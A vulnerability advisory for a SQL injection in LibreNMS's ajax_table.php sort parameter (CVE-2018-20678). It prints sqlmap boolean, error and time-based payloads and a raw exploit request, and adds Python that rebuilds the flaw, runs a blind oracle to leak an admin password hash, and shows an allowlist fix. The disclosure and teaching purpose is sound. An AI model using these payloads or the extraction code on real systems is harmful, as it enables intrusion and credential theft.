LibreNMS SQL Injection (fixed in 1.48 release)

Information

Advisory by CERT ENEA
Name: SQL Injection in LibreNMS software
Affected Software: LibreNMS
Affected Versions: prior to 1.48
Homepage: http://librenms.org
Vulnerability: SQL Injection
Severity: High
Status: fixed in 1.48 (28.1.2019)
CVE-ID: CVE-2018-20678
CVSS(3): 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Vulnerability description

The sort[hostname] parameter of ajax_table.php is vulnerable to SQL injection. Submitting a single quote (') in the parameter caused a database error to be returned in the response (see Technical Details below). sqlmap confirmed the injection with the following techniques and payloads:

Parameter: sort[hostname] (POST)

Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload: current=1&rowCount=50&sort[hostname]=asc,(SELECT (CASE WHEN (7936=7936) THEN 1 ELSE 7936*(SELECT 7936 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&searchPhrase=&id=devices&format=list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Type: error-based
Title: MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause
Payload: current=1&rowCount=50&sort[hostname]=asc,(SELECT 4732 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4732=4732,1))),0x71717a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&searchPhrase=&id=devices&format=list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: current=1&rowCount=50&sort[hostname]=asc PROCEDURE ANALYSE(EXTRACTVALUE(2115,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x52644e63))))),1)#&searchPhrase=&id=devices&format=list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=printer&state=&disabled=&ignore=&group=

Technical Details

https://librenms.mydomain.ltd/ajax_table.php

HTTP POST request (the sort direction is sent as asc' to trigger the error):

POST /ajax_table.php HTTP/1.1
Host: librenms.mydomain
Connection: close
Content-Length: 190
Accept: */*
Origin: https://librenms.mydomain
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://librenms.mydomain/devices/type=server/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=11b1adbc608591293c38ff52fcc4d74a; XSRF-TOKEN=eyJpdiI6Im1QVGtSdEhZbzZlZTZYcURUenBMelE9PSIsInZhbHVlIjoiUWFDNlErQnF1akpZTjFPMVFkeVBCUlNSZEQ4RGZFNWVNXC81TG90N1hcL3htS1NlZFBPcUdiVWl5UEVabHlHNTAzS2dDVUtJN3lRdmVTN3c5cE91bWFDdz09IiwibWFjIjoiYmIwMTk0OTIwZjcwNGVjZDIxNzYyMjBjYzNkZjM2MzcwNDVlNDlkNTE2YmY3M2VjMzJmMDAwZmEwMWZjYjU4ZCJ9; librenms_session=eyJpdiI6InM0cUxSZVZkaHc3TnFMQ0FpeGVOSnc9PSIsInZhbHVlIjoid0R5UkQ5c2pYRnZJc3NIK3RlNit3RDZjelpjWGl0NjFmbGRJa3k5eGNqQkg3NjR6TzBWNzdxQmJ5SGhtWDNiT3JWOVA2YjFmcDhTTzJBWldkaU5NYmc9PSIsIm1hYyI6Ijk4ZDJiZjVkNWJmNGZkMTc2MmY3MmNiNGE4YmIwNWRhZWUxNjRhMmMyMjc0MzkyMGY4ODU3ZmYxZTM2Mzk4MGUifQ%3D%3D

current=1&rowCount=50&sort%5Bhostname%5D=asc'&searchPhrase=&id=devices&format=+list_detail&searchquery=&os=&version=&hardware=&features=&location=&type=server&state=&disabled=&ignore=&group=

HTTP Response:

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 08 Jan 2019 00:16:08 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 822

SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 0,50' at line 1 (SQL: SELECT DISTINCT(`devices`.`device_id`),`devices`.*,locations.location  FROM `devices` LEFT JOIN locations ON devices.location_id = locations.id WHERE 1  AND type = server ORDER BY  hostname asc' LIMIT 0,50) (SQL: SELECT DISTINCT(`devices`.`device_id`),`devices`.*,locations.location  FROM `devices` LEFT JOIN locations ON devices.location_id = locations.id WHERE 1  AND type = server ORDER BY  hostname asc' LIMIT 0,50)
  /opt/librenms/html/includes/table/devices.inc.php:128
  /opt/librenms/html/ajax_table.php:44
{
    "current": 1,
    "rowCount": 50,
    "rows": [],
    "total": 42
}
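The leaked query above shows the root cause: the value of sort[hostname] is concatenated into ORDER BY (`ORDER BY hostname asc' LIMIT 0,50`), a position that cannot be protected with bound parameters. The following is an added example, not LibreNMS code and not the 1.48 patch: it rebuilds the vulnerable pattern against a constructed SQLite stand-in for the devices/users tables (the real schema is not reproduced), reproduces the quote probe, turns the CASE-in-ORDER-BY trick from the sqlmap boolean-based payload into a working blind-extraction oracle, and shows the allowlist fix. Because it runs on SQLite rather than MariaDB, the error-raising expression on the false branch is `abs()` of the smallest int64 (SQLite raises "integer overflow") in place of sqlmap's multi-row INFORMATION_SCHEMA subquery; the table contents, the admin hash and the function names are all assumptions made for the example.

```python
import sqlite3

# Constructed stand-in schema so the example runs offline on SQLite. It is NOT
# the LibreNMS schema; only the columns the leaked query uses are kept, plus a
# small users table as the target of the blind extraction.
SCHEMA = """
CREATE TABLE devices (device_id INTEGER PRIMARY KEY, hostname TEXT, type TEXT);
CREATE TABLE users   (user_id   INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO devices (hostname, type) VALUES
    ('sw-core-1', 'network'), ('srv-db-1', 'server'), ('srv-web-1', 'server');
INSERT INTO users (username, password) VALUES ('admin', '$2y$10$examplehash');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_query(db, sort, page_size=50):
    """The pattern behind the advisory: sort[<column>] -> '<column> <direction>'
    is concatenated straight into ORDER BY, as the leaked query shows."""
    column, direction = next(iter(sort.items()))
    sql = ("SELECT device_id, hostname FROM devices WHERE type = 'server' "
           f"ORDER BY {column} {direction} LIMIT 0,{int(page_size)}")
    return db.execute(sql).fetchall()


ALLOWED_SORT_COLUMNS = {"hostname", "device_id"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def is_safe_sort(sort):
    """ORDER BY identifiers cannot be bound as parameters, so the fix is an
    allowlist of both the column (the sort[...] key) and the direction."""
    column, direction = next(iter(sort.items()))
    return column in ALLOWED_SORT_COLUMNS and direction.lower() in ALLOWED_DIRECTIONS


def hardened_query(db, sort, page_size=50):
    if not is_safe_sort(sort):
        raise ValueError(f"rejected sort parameter: {sort!r}")
    column, direction = next(iter(sort.items()))
    sql = ("SELECT device_id, hostname FROM devices WHERE type = 'server' "
           f"ORDER BY {column} {direction.lower()} LIMIT 0,?")
    return db.execute(sql, (int(page_size),)).fetchall()


def probe(db, direction):
    """The advisory's first probe: a trailing quote yields a database error."""
    try:
        return "ok", vulnerable_query(db, {"hostname": direction})
    except sqlite3.OperationalError as e:
        return "error", str(e)


def oracle(db, condition):
    """Boolean oracle shaped like sqlmap's 'boolean-based blind - ORDER BY'
    payload: a CASE appended as a second sort key. True branch: a harmless
    column. False branch: an expression that raises a DB error (abs() of the
    smallest int64 -> 'integer overflow' in SQLite). 0*device_id keeps the
    expression row-dependent so the engine cannot pre-evaluate it as a
    constant before the CASE is reached. Error vs. normal response == 0 vs 1."""
    payload = (f"asc,(CASE WHEN ({condition}) THEN hostname "
               "ELSE abs(-9223372036854775808 + 0*device_id) END)")
    try:
        vulnerable_query(db, {"hostname": payload})
        return True
    except sqlite3.OperationalError:
        return False


def extract_password_hash(db, length=8):
    """Leak the admin password hash one character at a time via the oracle."""
    alphabet = "$./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    leaked = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password,{pos},1) FROM users "
                    f"WHERE username='admin') = '{ch}'")
            if oracle(db, cond):
                leaked += ch
                break
        else:
            break  # no character matched: end of the stored value
    return leaked


if __name__ == "__main__":
    db = connect()
    print(probe(db, "asc'"))            # ('error', 'unrecognized token: ...')
    print(extract_password_hash(db))    # $2y$10$e
    print(is_safe_sort({"hostname": "asc'"}), hardened_query(db, {"hostname": "desc"}))
```

The oracle needs roughly (alphabet size) requests per leaked character, which is why sqlmap can dump tables through a single ORDER BY injection; the time-based variant in the advisory (BENCHMARK inside PROCEDURE ANALYSE) is the same oracle with response delay instead of an error as the signal.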


Tested at:

====================================
Component | Version
--------- | -------
LibreNMS  | 1.47-18-gd303174
DB Schema | 278
PHP       | 7.2.11
MySQL     | 5.5.60-MariaDB
RRDTool   | 1.4.8
SNMP      | NET-SNMP 5.7.2
====================================


Timeline

8.1.2019 – first contact
11.1.2019 – technical details sent
11.1.2019 – vendor confirmed vulnerability
11.1.2019 – CVE assigned
28.1.2019 – patch released
1.2.2019 – CVE published

Credits

The issue was discovered by Dariusz Gońda, CERT ENEA member (https://cert.enea.pl)


© Copyright 2018 Grupa Enea. All rights reserved.